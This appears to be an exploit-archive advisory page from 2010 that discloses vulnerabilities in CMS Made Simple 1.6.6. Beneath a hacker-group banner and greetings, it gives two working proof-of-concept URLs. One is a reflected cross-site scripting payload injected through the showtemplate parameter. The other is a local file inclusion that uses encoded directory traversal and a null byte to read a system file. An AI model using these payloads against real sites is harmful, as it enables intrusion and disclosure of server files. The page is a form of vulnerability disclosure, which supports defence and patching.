[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CMS Made Simple 1.6.6 Multiple Vulnerabilities
# Published : 2010-02-12
# Author : Beenu Arora
# Previous Title : Alqatari Group Version 1.0 Blind SQL Injection Vulnerability
# Next Title : daChooch Remote Sql Injection Vulnerability


################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____    _      __| _/____    # 
#    / __ |__  \_  __   |/ // ___/  /_    / __ |/ __    # 
#   / /_/ | / __ |  | /    <  ___  _/   / /_/   ___/   # 
#   ____ |(______/__|  |__|_ \_____>_____  /_____|____   # 
#        /                  /             /                 # 
#                   ___________   ______  _  __                # 
#                 _/ ____  __ _/ __  / / /                # 
#                   ___|  | /  ___/     /                 # 
#                  ___  >__|    ___  >/_/                  # 
#      est.2007        /            /   forum.darkc0de.com   # 
################################################################ 
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
# 
# Home  : www.BeenuArora.com
# 
# Email : beenudel1986@gmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Exploit: Multiple Vulnerablities in cmsmadesimple
# 
# AppSite: http://www.cmsmadesimple.com/
# 
# Tested Version : 1.6.6
# XSS
# 
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
# 
#
# 
# Multiple Local File Inclusion
#
# Sample URL: 
# POC:-http://server/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################